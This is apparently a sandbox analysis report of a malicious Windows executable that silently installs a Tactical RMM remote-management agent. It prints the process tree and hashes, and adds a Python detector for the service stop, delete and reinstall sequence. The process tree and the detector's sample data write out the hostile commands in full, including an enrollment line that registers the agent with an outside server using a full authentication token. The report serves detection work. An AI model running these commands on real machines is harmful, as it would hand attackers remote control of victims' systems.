Analysis

  • max time kernel
    94s
  • max time network
    143s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    19/11/2024, 13:36

General

  • Target

    2024-11-19_a29ed5c94563aaf6908124c90b17fc33_frostygoop_luca-stealer_poet-rat_snatch.exe

  • Size

    5.0MB

  • MD5

    a29ed5c94563aaf6908124c90b17fc33

  • SHA1

    f55fa19a81c788d35516170cac51058b011e4ac8

  • SHA256

    cab0710ff3dfc47b8cf4ccea235af9914fadf7ebe1a09acbbf8abe646a885667

  • SHA512

    f7fe9034a368d9e80d49b5bb9d9ad3a5297bc2748e538c227303d860e86ad286c93cc61087be5a1e9c3f745d3f2558021313b11791c011af157dafb32b9000ca

  • SSDEEP

    49152:JQ/lTzPN+tedV9nrb/T8vO90d7HjmAFd4A64nsfJJ6COtrzA4Xe1FxU1T/RX7BuR:6N+tedV5aQw1DPutbREm+eb

Malware Config

Signatures

  • Stops running service(s) 4 TTPs
  • Executes dropped EXE 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Drops file in Program Files directory 6 IoCs
  • Launches sc.exe 2 IoCs

    sc.exe is the built-in Windows utility for managing services (create, configure, start, stop, delete). Here it is invoked twice, as "sc delete tacticalagent" and "sc delete tacticalrpc", removing the existing service entries before the dropped agent re-registers itself with "tacticalrmm.exe -m installsvc".

  • System Location Discovery: System Language Discovery 1 TTPs 23 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location. In this run the signature fires on nearly every process in the tree, including cmd.exe, ping.exe, net.exe and sc.exe, so on its own it says little about the sample.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 4 IoCs

    Adversaries may check for Internet connectivity on compromised systems. Here the trigger is "ping 127.0.0.1 -n 2", which targets the loopback address and cannot reach the Internet; in a cmd.exe "ping ... && ..." chain it is the common idiom for a roughly one-second pause before the following "net stop", so treat it as a delay rather than a connectivity check.

  • Kills process with taskkill 1 IoCs
  • Modifies system certificate store 2 TTPs 3 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\2024-11-19_a29ed5c94563aaf6908124c90b17fc33_frostygoop_luca-stealer_poet-rat_snatch.exe
    "C:\Users\Admin\AppData\Local\Temp\2024-11-19_a29ed5c94563aaf6908124c90b17fc33_frostygoop_luca-stealer_poet-rat_snatch.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:384
    • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe
      C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe /VERYSILENT /SUPPRESSMSGBOXES
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4796
      • C:\Users\Admin\AppData\Local\Temp\is-P6SDU.tmp\tacticalagent-v2.8.0-windows-amd64.tmp
        "C:\Users\Admin\AppData\Local\Temp\is-P6SDU.tmp\tacticalagent-v2.8.0-windows-amd64.tmp" /SL5="$9015A,3652845,825344,C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe" /VERYSILENT /SUPPRESSMSGBOXES
        3⤵
        • Executes dropped EXE
        • Drops file in Program Files directory
        • System Location Discovery: System Language Discovery
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of WriteProcessMemory
        PID:1652
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:2412
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:1564
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrpc
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4104
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrpc
              6⤵
              • System Location Discovery: System Language Discovery
              PID:632
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net stop tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2384
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalagent
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4964
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalagent
              6⤵
              • System Location Discovery: System Language Discovery
              PID:3280
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          • System Network Configuration Discovery: Internet Connection Discovery
          • Suspicious use of WriteProcessMemory
          PID:1156
          • C:\Windows\SysWOW64\PING.EXE
            ping 127.0.0.1 -n 2
            5⤵
            • System Location Discovery: System Language Discovery
            • System Network Configuration Discovery: Internet Connection Discovery
            • Runs ping.exe
            PID:4856
          • C:\Windows\SysWOW64\net.exe
            net stop tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4020
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 stop tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1656
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c taskkill /F /IM tacticalrmm.exe
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1568
          • C:\Windows\SysWOW64\taskkill.exe
            taskkill /F /IM tacticalrmm.exe
            5⤵
            • System Location Discovery: System Language Discovery
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:3936
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalagent
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4748
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalagent
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:3004
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c sc delete tacticalrpc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:1448
          • C:\Windows\SysWOW64\sc.exe
            sc delete tacticalrpc
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:4540
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c tacticalrmm.exe -m installsvc
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2152
          • C:\Program Files\TacticalAgent\tacticalrmm.exe
            tacticalrmm.exe -m installsvc
            5⤵
            • Executes dropped EXE
            • Drops file in Program Files directory
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:892
        • C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /c net start tacticalrmm
          4⤵
          • System Location Discovery: System Language Discovery
          PID:3700
          • C:\Windows\SysWOW64\net.exe
            net start tacticalrmm
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3940
            • C:\Windows\SysWOW64\net1.exe
              C:\Windows\system32\net1 start tacticalrmm
              6⤵
              • System Location Discovery: System Language Discovery
              PID:468
    • C:\Program Files\TacticalAgent\tacticalrmm.exe
      "C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install --api https://api.corumba.digital --client-id 24 --site-id 104 --agent-type workstation --auth 87766753a9b1429e935f6f03ece6e11342734e57afa9f5322b36f1b8e76c8c14
      2⤵
      • Executes dropped EXE
      • Drops file in Program Files directory
      • Modifies system certificate store
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:1628
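
The process tree above is the Tactical RMM agent installer's own uninstall-then-reinstall sequence: the Inno Setup stage (PID 1652, note the is-XXXX.tmp path and /SL5 switch) stops the tacticalrpc, tacticalagent and tacticalrmm services, kills tacticalrmm.exe, deletes the tacticalagent and tacticalrpc service entries, re-registers the service with "-m installsvc" and starts it; the submitted sample (PID 384) then enrolls the agent against https://api.corumba.digital with a client ID, site ID and an authentication token. Since the same installer is used legitimately, the detection value lies in the combination (service teardown plus reinstall, driven from a sample in %TEMP%, followed by an enrollment command pointing at an RMM server your organisation does not operate) and in extracting the enrollment parameters as indicators. The following Python is an added example, not part of this report or of the Tactical RMM project: it classifies constructed process-creation records that mirror the command lines shown above (the pid/ppid/cmdline fields are an assumed minimal schema, not a real Sysmon or EDR format), flags a parent whose children perform the stop/delete/install/start sequence, and pulls the --api host, client and site IDs and a redacted token prefix out of the enrollment command.

```python
"""Flag the service stop/delete/reinstall sequence and extract RMM enrollment
parameters from process-creation command lines.

Added example; not part of the sandbox report or of Tactical RMM. The records
in SAMPLE_EVENTS are constructed to mirror the process tree in the report, and
the pid/ppid/cmdline fields are an assumed minimal schema."""
import re
from collections import defaultdict
from dataclasses import dataclass
from urllib.parse import urlparse


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    cmdline: str


# Constructed from the report: PID 1652 (the installer's .tmp stage) drives the
# teardown and reinstall; PID 384 (the submitted sample) runs the enrollment.
SAMPLE_EVENTS = [
    ProcEvent(2412, 1652, '"cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrpc'),
    ProcEvent(1564, 2412, 'ping 127.0.0.1 -n 2'),
    ProcEvent(4104, 2412, 'net stop tacticalrpc'),
    ProcEvent(632, 4104, r'C:\Windows\system32\net1 stop tacticalrpc'),
    ProcEvent(2384, 1652, '"cmd.exe" /c net stop tacticalagent'),
    ProcEvent(1156, 1652, '"cmd.exe" /c ping 127.0.0.1 -n 2 && net stop tacticalrmm'),
    ProcEvent(1568, 1652, '"cmd.exe" /c taskkill /F /IM tacticalrmm.exe'),
    ProcEvent(4748, 1652, '"cmd.exe" /c sc delete tacticalagent'),
    ProcEvent(1448, 1652, '"cmd.exe" /c sc delete tacticalrpc'),
    ProcEvent(2152, 1652, '"cmd.exe" /c tacticalrmm.exe -m installsvc'),
    ProcEvent(3700, 1652, '"cmd.exe" /c net start tacticalrmm'),
    ProcEvent(1628, 384, r'"C:\Program Files\TacticalAgent\tacticalrmm.exe" -m install'
                         ' --api https://api.corumba.digital --client-id 24 --site-id 104'
                         ' --agent-type workstation --auth'
                         ' 87766753a9b1429e935f6f03ece6e11342734e57afa9f5322b36f1b8e76c8c14'),
]

# Each pattern yields (action, target). Matching the cmd.exe line itself also
# catches the "ping 127.0.0.1 -n 2 && ..." idiom, where the loopback ping is a
# sleep before the real command, not a connectivity check.
ACTION_PATTERNS = [
    ("stop",       re.compile(r"\bnet1?(?:\.exe)?\s+stop\s+(\S+)", re.I)),
    ("start",      re.compile(r"\bnet1?(?:\.exe)?\s+start\s+(\S+)", re.I)),
    ("delete",     re.compile(r"\bsc(?:\.exe)?\s+delete\s+(\S+)", re.I)),
    ("kill",       re.compile(r"\btaskkill(?:\.exe)?\b.*?/IM\s+(\S+)", re.I)),
    ("installsvc", re.compile(r"\s-m\s+(installsvc)\b", re.I)),
]

# Enrollment flags as they appear in the observed "-m install" command line.
INSTALL_MODE = re.compile(r"\s-m\s+install(?!svc)\b", re.I)
ENROLL_FLAGS = {
    "api":        re.compile(r"--api\s+(\S+)", re.I),
    "client_id":  re.compile(r"--client-id\s+(\S+)", re.I),
    "site_id":    re.compile(r"--site-id\s+(\S+)", re.I),
    "agent_type": re.compile(r"--agent-type\s+(\S+)", re.I),
    "auth":       re.compile(r"--auth\s+(\S+)", re.I),
}


def classify(cmdline):
    """Return the (action, target) pairs a single command line performs."""
    return [(action, m.group(1).lower())
            for action, pat in ACTION_PATTERNS
            for m in pat.finditer(cmdline)]


def parse_enrollment(cmdline):
    """Extract RMM enrollment parameters from a '-m install --api ...' line.

    Returns None for anything else, including '-m installsvc'. The token is
    truncated to a prefix so alert text never carries a usable credential."""
    if not INSTALL_MODE.search(cmdline):
        return None
    out = {}
    for key, pat in ENROLL_FLAGS.items():
        m = pat.search(cmdline)
        out[key] = m.group(1) if m else None
    out["api_host"] = urlparse(out["api"]).hostname if out["api"] else None
    if out["auth"]:
        out["auth"] = out["auth"][:8] + "..."
    return out


def analyze(events):
    """Group actions by parent PID and flag a parent whose children stop or
    kill services, delete service entries and then install or start a service
    (the sequence under PID 1652 above). Also collect every enrollment line."""
    by_parent = defaultdict(lambda: defaultdict(set))
    enrollments = []
    for ev in events:
        for action, target in classify(ev.cmdline):
            by_parent[ev.ppid][action].add(target)
        enrollment = parse_enrollment(ev.cmdline)
        if enrollment:
            enrollments.append({"pid": ev.pid, "ppid": ev.ppid, **enrollment})
    flagged = {}
    for ppid, acts in by_parent.items():
        teardown = (acts["stop"] or acts["kill"]) and acts["delete"]
        reinstall = acts["installsvc"] or acts["start"]
        if teardown and reinstall:
            flagged[ppid] = {k: set(acts[k]) for k in ("stopped", "deleted", "killed", "started")
                             if False} or {
                "stopped": set(acts["stop"]), "deleted": set(acts["delete"]),
                "killed": set(acts["kill"]), "started": set(acts["start"]),
            }
    return {"service_replacement": flagged, "enrollments": enrollments}


if __name__ == "__main__":
    import json
    print(json.dumps(analyze(SAMPLE_EVENTS), indent=2, default=sorted))
```

Running the module prints one flagged parent (1652) with the three stopped services, the two deleted service entries, the killed image and the started service, plus a single enrollment record whose api_host is api.corumba.digital. In a real pipeline the same two functions would run over EDR or Sysmon Event ID 1 command lines grouped by parent process GUID rather than PID, and the api_host would be compared against the list of RMM servers the organisation actually operates.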

Network

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Program Files\TacticalAgent\tacticalrmm.exe

    Filesize

    9.2MB

    MD5

    6cfbd2da5f304a3b8972eafe6fe4d191

    SHA1

    09c1600064cb9d157c55c88f76f107373404b2ae

    SHA256

    ad29d4e9e01870ffbdb6f2498e6ce36a708e56db2ad431ba2d80bf5a6caac069

    SHA512

    03a29d2eb00a97b3fc83e55a8b8b1fe3e7adbb06fe598ed5525bb3764caced0bf5a28a3fd70e36b66687fcce5a9e7c9243ee6ab3a82d394044f3c60714a423e8

  • C:\ProgramData\TacticalRMM\tacticalagent-v2.8.0-windows-amd64.exe

    Filesize

    4.3MB

    MD5

    ed40540e7432bacaa08a6cd6a9f63004

    SHA1

    9c12db9fd406067162e9a01b2c6a34a5c360ea97

    SHA256

    d6c7bdab07151678b713a02efe7ad5281b194b0d5b538061bdafdf2c4ca1fdaa

    SHA512

    07653d534a998248f897a2ed962d2ec83947c094aa7fe4fb85e40cb2771754289fe2cef29e31b5aa08e8165d5418fe1b8049dedc653e799089d5c13e02352e8d

  • C:\Users\Admin\AppData\Local\Temp\is-P6SDU.tmp\tacticalagent-v2.8.0-windows-amd64.tmp

    Filesize

    3.0MB

    MD5

    a639312111d278fee4f70299c134d620

    SHA1

    6144ca6e18a5444cdb9b633a6efee67aff931115

    SHA256

    4b0be5167a31a77e28e3f0a7c83c9d289845075b51e70691236603b1083649df

    SHA512

    f47f01d072ff9ed42f5b36600ddfc344a6a4b967c1b671ffc0e76531e360bfd55a1a9950305ad33f7460f3f5dd8953e317b108cd434f2db02987fa018d57437c

  • memory/1652-12-0x0000000000400000-0x0000000000712000-memory.dmp

    Filesize

    3.1MB

  • memory/1652-26-0x0000000000400000-0x0000000000712000-memory.dmp

    Filesize

    3.1MB

  • memory/4796-8-0x0000000000401000-0x00000000004B7000-memory.dmp

    Filesize

    728KB

  • memory/4796-5-0x0000000000400000-0x00000000004D7000-memory.dmp

    Filesize

    860KB

  • memory/4796-27-0x0000000000400000-0x00000000004D7000-memory.dmp

    Filesize

    860KB